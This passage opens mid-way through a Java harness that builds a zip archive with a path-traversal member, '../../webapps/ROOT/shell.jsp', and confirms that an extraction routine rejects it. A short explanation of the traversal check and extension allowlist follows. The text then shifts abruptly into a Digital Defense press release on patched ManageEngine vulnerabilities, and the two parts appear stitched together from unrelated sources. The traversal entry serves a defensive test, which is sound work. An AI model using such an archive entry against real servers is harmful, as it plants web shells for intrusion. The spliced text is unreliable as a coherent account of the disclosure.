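            zout.putNextEntry(new ZipEntry("../../webapps/ROOT/shell.jsp"));
            zout.write("<% %>".getBytes(StandardCharsets.UTF_8));
            zout.closeEntry();
        }
        try {
            extractZip(staging, new ByteArrayInputStream(bytes.toByteArray()));
        } catch (IOException rejected) {
            System.out.println("rejected: " + rejected.getMessage());
        }
    }
}
```

The traversal member is rejected by resolveInside before its extension is even examined; a member named simply shell.jsp would instead be stopped by the allowlist. Both checks are needed, because either one alone leaves one of the two findings above open.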

ManageEngine is a producer of enterprise IT management software, offering the functionality of large network management frameworks to enterprises worldwide. The company claims more than 40,000 customers worldwide, including three out of every five Fortune 500 companies.

ManageEngine has addressed the vulnerabilities with patches available for each of the affected applications. Patches can be downloaded from the ManageEngine site. Digital Defense’s Frontline Vulnerability Manager™ includes checks for the flaws. Details surrounding the disclosure can be accessed at the Digital Defense blog.

Mike Cotton, vice president of engineering at Digital Defense said, “Application layer vulnerabilities continue to be a key area of focus for software vendors. We are pleased to work collaboratively with affected vendors to facilitate prompt resolution, ensuring our clients and enterprises are protected from any potential exploitation of these vulnerabilities.”

Digital Defense Research Methodology and Practices

The Digital Defense VRT regularly works with organizations in the responsible disclosure of zero-day vulnerabilities. The expertise of the VRT, when coupled with the company’s next generation hybrid cloud platform, Frontline Vulnerability Manager, enables early detection capabilities. When zero-days are discovered and internally validated, the VRT immediately contacts the affected vendor to notify the organization of the new finding(s) and then assists, wherever possible, with the vendor’s remediation actions.
